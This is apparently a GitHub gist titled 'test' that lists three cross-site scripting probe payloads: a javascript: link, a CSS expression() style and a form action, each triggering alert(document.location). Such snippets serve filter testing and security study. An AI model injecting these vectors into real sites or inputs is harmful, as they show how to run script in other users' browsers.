Skip to content

Instantly share code, notes, and snippets.

@ccpz
Last active August 29, 2015 14:01
Show Gist options
  • Save ccpz/a3b34d2318412b907701 to your computer and use it in GitHub Desktop.
Save ccpz/a3b34d2318412b907701 to your computer and use it in GitHub Desktop.
test
<a href="javascript:alert(document.location);">XSS</a> // or
<b style="width: expression(alert(document.location));">XSS</b> // or
<form action="javascript:alert(document.location);"><input type="submit" /></form>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment